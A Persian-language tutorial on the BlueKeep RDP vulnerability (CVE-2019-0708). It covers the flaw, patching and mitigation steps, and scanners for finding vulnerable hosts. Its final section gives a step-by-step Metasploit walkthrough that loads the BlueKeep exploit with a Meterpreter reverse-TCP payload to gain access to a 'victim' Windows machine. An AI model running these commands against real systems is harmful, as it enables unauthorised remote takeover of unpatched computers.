زمان مطالعه : ۳ دقیقه

در این مقاله قصد دارم یافتن سیستم‌های آلوده، راه‌حل مقابله با آسیب پذیری BlueKeep و نفوذ به ویندوز از طریق RDP با اکسپلویت BlueKeep به صورت کامل به شما آموزش دهم.

Remote Desktop چیست؟؟

واژه Remote Desktop به معنی قابلیت اتصال از راه دور کامپیوترها به یکدیگر به منظور کنترل دسکتاپ آن ها می باشد به طوری که دقیقا کاربر پای همان سیستم نشسته و به آن Login کرده است،تنها تفاوت در این است که این ارتباط از طریق بستر شبکه برقرار شده است.
پروتکل Remote Desktop یا به اختصار RDP متعلق به شرکت مایکروسافت می باشد.
پورت این پروتکل بصورت پیش فرض ۳۳۸۹ است که می توانید با تنظیماتی در رجیستری ویندوز آن را تغییر دهید.

آسیب پذیری BlueKeep :

شرکت مایکروسافت درسال ۲۰۱۹ خبرازشناسایی آسیب‎پذیری بانام CVE-2019-0708 برای سرویس RDP داد که می‎تواند منجر به اجرای دستور ازراه دورشود.
این آسیب پذیری معرفی شده برای نسخه‎های Windows 2008 R2 ،Windows 2008 و Windows 2003 از نسخه‎های سرور ویندوز و نسخه‎های Windows 7 ،Windows Vista و Windows XP از نسخه‎های کلاینت ویندوز گزارش شد.
چون سرویس RDP کاربرد بسیاری در دنیای اینترنت دارد، آسیب‎پذیری با سطح critical severity، درجه بندی شد تا حساسیت و درجه اهمیت آن را برای کاربران سیستم عامل ماکروسافت مشخص کند.

اکسپلویت آسیب‌پذیری سرویس RDP با نام BlueKeep برای CVE-2019-0708 انتشار یافت. این آسیب‎پذیری قبل از Login کاربر رخ می‎دهد که امکان به‎کارگیری این آسیب‎پذیری برای انتشار worm را ایجاد می‎کند. برای برطرف کردن این آسیب‎پذیری روی سرویس RDP باید سیستم‎عامل ویندوز خود را به‎روزرسانی کنید و از به‎روز شدن این وصله طبق جدول مایکروسافت و به‌طور خاص KB4499175 مطمین شوید؛ وگرنه، به‌راحتی در ماه‎های آینده مورد نفوذ قرار خواهید گرفت. برای بررسی این‎که سرویس شما آسیب‎پذیر است یا نه می‎توانید از این ابزار استفاده کنید.

راه‌حل مقابله با آسیب پذیری BlueKeep برای سازمان‌ها و کاربران

  • غیرفعال کردن سرویس‌های RDP درصورتی که مورد نیاز نباشند.
  • به روز کردن پیوسته سیستم عامل های کلاینت و سرور به آخرین نسخه موجود ارائه شده از شرکت ماکروسافت
  • مسدود کردن پورت ۳۳۸۹ در فایروال edge سازمان یا پیکربندی RDP به‌شیوه‌ای که تنها از طریق یک VPN یا دستگاه‌های موجود در شبکه قابل دسترسی باشد.
  • به‌ کار بردن Signatureهای IDS/IPS برای شناسایی اکسپلویت که به دلیل رمزنگاری ترافیک اثر قابل توجهی ندارد.
  • فعال‌سازیِ Network Level Authentication یا به اختصار NLA که در صورت داشتن اطلاعات اعتباری صحیح قابل استفاده است.

یافتن سیستم‌های آلوده

  • ابزار rdpscan گراهام، که برای اسکن شبکه‌های کوچک مناسب است.
  • شان دیلن Sean Dillon، پژوهشگر ارشد امنیتِ شرکت RiskSense به همراه یک محقق دیگر به نام JaGoTu، اسکنری ساخته‌اند که به یک افزونه‌ی Metasploit تبدیل شده است.
  • کمپانی Tenable نیز مجموعه‌ای افزونه را برای شناسایی وجود CVE-2019-0708 و یک بررسی Uncredentialed را برای فعال‌سازی امکان شناسایی نقص Wormable برای مشتری‌ها، عرضه کرده است.

نفوذ به ویندوز از طریق RDP با اکسپلویت BlueKeep

حال به سراغ نفوذ به ویندوز از طریق RDP با اکسپلویت BlueKeep می رویم :

متااسپلویت را با دستور زیر در Kali Linux اجرا میکنیم.

 msfconsole 

بعد از اجرای متااسپلویت با دستور زیر BlueKeep را انتخاب می کنیم. (دانلود اکسپلویت BlueKeep )


use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

حال باید IP Address سیستمی که می خواهیم به آن نفوذ کنیم را طبق دستور زیر وارد کنیم.


set RHOSTS 192.168.1.2

حال باید با دستور زیر یک Payload برای نفوذ را انتخاب کنیم.


set PAYLOAD windows/meterpreter/reverse_tcp

با دستور زیر Target را انتخاب میکنیم این Exploit فعلا فقط روی Windows 7 and Windows Server 2008 R2 کار می کند پس شما باید بسته به نوع سیستم عامل مورد نظر خود Target یکی از گزینه ها رو انتخاب کنید.


set TARGET 2

به انتها دستورات رسیدیم و با دستور پایانی exploit اکسپلویت رو اجرا میکنیم و صبر می کنیم تا دسترسی به سیستم قربانی برای ما برقرار شود.

Learn how to find, deal with and penetrate Windows via RDP with BlueKeep exploit